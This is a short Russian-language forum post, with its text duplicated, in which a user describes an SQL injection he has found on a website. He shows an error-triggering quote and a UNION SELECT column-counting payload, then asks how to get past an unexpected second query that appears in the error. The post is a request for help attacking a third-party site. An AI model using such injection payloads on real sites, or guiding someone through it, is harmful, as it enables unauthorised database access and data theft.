Daimyo
30.10.2006, 09:23
добрый день появилась такая вот проблема
есть сайт в котором найдена бага sql injection for example
www.some.ru/bag.php?a=4'
вылазит ошибка аля :
sql error
select first, second , third from test where a=4'
подбираю кол столбцов когда их неверное кол-во вылазит сообщение об этом , вообщем пока все хорошо но как только дохожу до нужного значения например
www.some.ru/bag.php?a=4+union+select+null,null,null/*
вылазит ошибка sql но в тексте ошибки стоит уже другой запрос например:
sql error
select one from table where test=
те в качестве условия where стоит таблица из которой бралось в первом запросе )
вобщем вопрос банален что мне делать ? )
ЗЫ надеюсь объяснил номрамльно если что то не понятно постораюсь дополнить :)
есть сайт в котором найдена бага sql injection for example
www.some.ru/bag.php?a=4'
вылазит ошибка аля :
sql error
select first, second , third from test where a=4'
подбираю кол столбцов когда их неверное кол-во вылазит сообщение об этом , вообщем пока все хорошо но как только дохожу до нужного значения например
www.some.ru/bag.php?a=4+union+select+null,null,null/*
вылазит ошибка sql но в тексте ошибки стоит уже другой запрос например:
sql error
select one from table where test=
те в качестве условия where стоит таблица из которой бралось в первом запросе )
вобщем вопрос банален что мне делать ? )
ЗЫ надеюсь объяснил номрамльно если что то не понятно постораюсь дополнить :)